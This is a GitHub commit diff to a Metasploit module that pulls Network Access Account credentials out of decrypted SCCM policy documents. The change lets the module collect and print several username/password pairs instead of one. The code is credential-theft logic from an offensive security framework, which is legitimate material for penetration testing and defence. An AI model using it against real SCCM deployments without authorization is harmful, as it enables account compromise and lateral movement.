Skip to content

Commit

Permalink
Report multiple NAA creds, if present
Browse files Browse the repository at this point in the history
  • Loading branch information
@smashery
smashery committed Dec 10, 2024
1 parent f7c5a37 commit fd764ef
Showing 1 changed file with 15 additions and 9 deletions.
24 changes: 15 additions & 9 deletions modules/auxiliary/admin/sccm/get_naa_creds.rb
View file
Original file line number Diff line number Diff line change
Expand Up @@ -127,9 +127,11 @@ def run
sleep(duration)
naa_policy_url = get_policies(http_opts, mp, key, cert, sms_id)
decrypted_policy = request_policy(http_opts, naa_policy_url, sms_id, key)
username, password = get_creds_from_policy_doc(decrypted_policy)
results = get_creds_from_policy_doc(decrypted_policy)

print_good("Found valid NAA creds: #{username}:#{password}")
results.each do |username, password|
print_good("Found valid NAA creds: #{username}:#{password}")
end
end
rescue Errno::ECONNRESET
fail_with(Failure::Disconnected, 'The connection was reset.')
Expand Down Expand Up @@ -165,7 +167,7 @@ def request_policy(http_opts, policy_url, sms_id, key)
cms_envelope = ci.enveloped_data

ri = cms_envelope[:recipient_infos]
if ri.empty?
if ri.value.empty?
fail_with(Failure::UnexpectedReply, 'No recipient infos provided')
end

Expand Down Expand Up @@ -320,14 +322,18 @@ def register_request(http_opts, mp, key, cert)

def get_creds_from_policy_doc(policy)
xml_doc = Nokogiri::XML(policy)
naa_section = xml_doc.xpath(".//instance[@class='CCM_NetworkAccessAccount']")
username = naa_section.xpath("//property[@name='NetworkAccessUsername']/value").text
password = naa_section.xpath("//property[@name='NetworkAccessPassword']/value").text
naa_sections = xml_doc.xpath(".//instance[@class='CCM_NetworkAccessAccount']")
results = Set.new
naa_sections.each do |section|
username = section.xpath("//property[@name='NetworkAccessUsername']/value").text
username = deobfuscate_policy_value(username)

username = deobfuscate_policy_value(username)
password = deobfuscate_policy_value(password)
password = section.xpath("//property[@name='NetworkAccessPassword']/value").text
password = deobfuscate_policy_value(password)

[username, password]
results.add([username, password])
end
results
end

def deobfuscate_policy_value(value)
Expand Down

0 comments on commit fd764ef

Please sign in to comment.